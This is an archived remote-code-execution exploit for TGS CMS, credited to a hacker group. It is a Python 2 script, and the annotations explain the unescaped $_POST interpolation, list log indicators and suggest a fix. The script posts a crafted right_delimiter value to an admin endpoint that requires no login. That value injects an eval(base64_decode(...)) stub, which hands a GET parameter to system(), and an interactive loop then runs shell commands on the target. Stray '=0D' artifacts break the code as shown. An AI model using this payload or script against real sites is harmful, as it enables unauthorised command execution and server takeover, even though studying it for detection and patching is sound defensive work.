
TGS CMS Remote Code Execution Exploit



#			TGS CMS Remote Code Execution Exploit
#					by 0in
#				from Dark-Coders Group!
#				 www.dark-coders.pl
# Contact: 0in(dot)email[at]gmail(dot)com
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot
# Let's analyze the vuln:
# We've got the file: /cms/admin/admin.template_engine.php
# first line:"template_dir    = "'.$_POST['template_dir'].'";
# 78:$tgs_template->config_dir      = "'.$_POST['config_dir'].'";
# 79:$tgs_template->cms_dir		  = "'.$_POST['cms_dir'].'";
# 80:$tgs_template->left_delimiter  = "'.$_POST['left_delimiter'].'";
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
# And.. boom! The $_POST values above are placed unescaped between double quotes
# in what appears to be generated PHP source, and that text is then written to disk:
# 89:	if (@fwrite($handle,$content)) {
# Just a simple exploit for fun:
# Python 2 proof-of-concept (httplib, raw_input, print statement). Every line
# ends in "=0D", a quoted-printable carriage return left over from archiving,
# so the listing is not valid Python as shown.
#
# Flow: one POST to admin.template_engine.php?option=set_template carrying a
# crafted right_delimiter, then a loop that reads commands from stdin, sends
# each one as a GET to /cms/index.php and prints the response body.
#
# What to look for on a host running this CMS:
#   - access-log POSTs to /cms/admin/admin.template_engine.php?option=set_template
#     followed by GETs to /cms/index.php carrying a "zuo" query parameter;
#   - "eval(base64_decode(" or "error_reporting(0)" inside the PHP file that
#     admin.template_engine.php writes.
# Fix direction on the PHP side: require an authenticated admin session for
# admin.template_engine.php, and stop interpolating request values into
# generated PHP source (emit them with var_export(), or keep the settings in a
# non-executable format).
import httplib=0D
import urllib=0D
print "TGS CMS Remote Code Execution Exploit"=0D
print "by 0in From Dark-Coders Group"=0D
print "www.dark-coders.pl"=0D 
# Host name and URL path prefix are read interactively; both are concatenated
# into the connection string and request paths below without any checks.
print 'Enter target:'=0D
target=raw_input()=0D
print 'Enter path:'=0D
path=raw_input()=0D
# Value sent as right_delimiter. The leading `";` ends the double-quoted PHP
# string that line 81 of admin.template_engine.php (quoted in the header
# comment) builds around $_POST['right_delimiter']; the trailing `//` comments
# out whatever is left of that generated line. The base64 text decodes to a
# short PHP stub that hands the "zuo" GET parameter to system() and exits.
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"=0D
# Plain HTTP on a hard-coded port 80, so the request is visible in cleartext
# to network monitoring.
exploit=httplib.HTTPConnection(target+':80')=0D
# Only Content-type and Accept are sent: no cookie or credentials. As written,
# the script assumes the admin endpoint answers unauthenticated requests.
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}=0D
# Only right_delimiter is supplied; the other fields listed in the header
# comment (template_dir, config_dir, cms_dir, left_delimiter) are left out.
data=urllib.urlencode({'right_delimiter':inject})=0D
exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers)=0D
print exploit.getresponse().read()=0D
# Interactive loop; typing "exit" ends the interpreter via quit().
while(1):=0D
	cmd=raw_input("[shell@"+target+"]#")=0D
	if(cmd=='exit'):=0D
		quit()=0D
	# A new connection is opened per command. cmd is appended to the query
	# string as typed, so each command appears in the request line of the
	# server's access log.
	# NOTE(review): presumably /cms/index.php loads the file written by the
	# POST above; the listing does not show which file that is -- confirm
	# against the CMS source.
	shell=httplib.HTTPConnection(target+':80')=0D
	shell.request("GET",path+"/cms/index.php?zuo="+cmd)=0D
	print shell.getresponse().read()=0D
=0D
	=0D
	=0D
=0D
	=0D
